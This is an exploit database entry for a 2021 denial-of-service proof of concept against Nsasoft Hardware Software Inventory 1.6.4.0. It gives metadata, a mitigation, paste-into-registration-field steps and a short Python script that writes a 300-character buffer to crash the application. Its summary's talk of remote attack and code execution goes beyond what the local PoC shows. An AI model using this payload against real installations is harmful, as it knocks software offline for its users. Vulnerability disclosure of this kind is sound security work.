Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)

vendor:

Hardware Software Inventory

by:

Enes Özeser

7.8

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Hardware Software Inventory

Affected Version From: 1.6.4.0

Affected Version To: 1.6.4.0

Patch Exists: YES

Related CWE: N/A

CPE: a:nsasoft:hardware_software_inventory:1.6.4.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2021

Nsasoft Hardware Software Inventory 1.6.4.0 – ‘multiple’ Denial of Service (PoC)

This vulnerability allows remote attackers to cause a denial of service (application crash) via a crafted input. An attacker must first obtain the target system, then send a malicious input to the vulnerable application in order to execute the attack. The specific flaw exists within the handling of the registration code. The issue lies in the lack of proper validation of user-supplied data, which can result in a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to version 1.6.4.1 or later, as it has been reported to fix this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Author : Enes Özeser
# Exploit Date: 2021-02-28
# Vendor Homepage : https://www.nsauditor.com/
# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
# Version: 1.6.4.0
# Tested on: Windows 10

# Steps: 
1- Run the python script. (payload.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'. 
4- Register -> Enter Registeration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.

---> payload.py <--

#!/usr/bin/env python
buffer = "\x41" * 300

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print "File created!" 
except:
    print "File cannot be created!"